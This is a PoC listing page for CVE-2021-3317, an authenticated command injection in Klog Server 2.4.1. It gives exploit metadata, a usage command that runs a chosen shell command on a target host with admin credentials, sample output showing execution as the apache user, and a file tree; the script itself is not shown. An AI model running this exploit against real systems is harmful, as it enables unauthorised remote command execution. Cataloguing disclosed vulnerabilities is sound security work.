CVE-2021-3317 PoC — KLog 命令注入漏洞

Source

Associated Vulnerability

Description

CVE-2021-3317

Readme

## Information
Exploit Title: Klog Server 2.4.1 - Command Injection (Authenticated)

Date: 26.01.2021

Exploit Author: Metin Yunus Kandemir

Vendor Homepage: https://www.klogserver.com/

Version: 2.4.1

Description: https://docs.unsafe-inline.com/0day/klog-server-authenticated-command-injection

CVE: 2021-3317

## How to use
```
python3 PoC.py --target 10.10.56.51 --username admin --password admin --command id 
[*] Status Code for login request: 302
[+] Authentication was successful!
[*] Exploiting...

uid=48(apache) gid=48(apache) groups=48(apache)
```

## Reference
https://docs.unsafe-inline.com/0day/klog-server-authenticated-command-injection

File Snapshot

 [4.0K]  /data/pocs/7385b54d5500d9d4c535342b6dc63207e08348e1
├── [3.2K]  klogserver_authenticated_command_injection.py
└── [ 681]  README.md

0 directories, 2 files

Remarks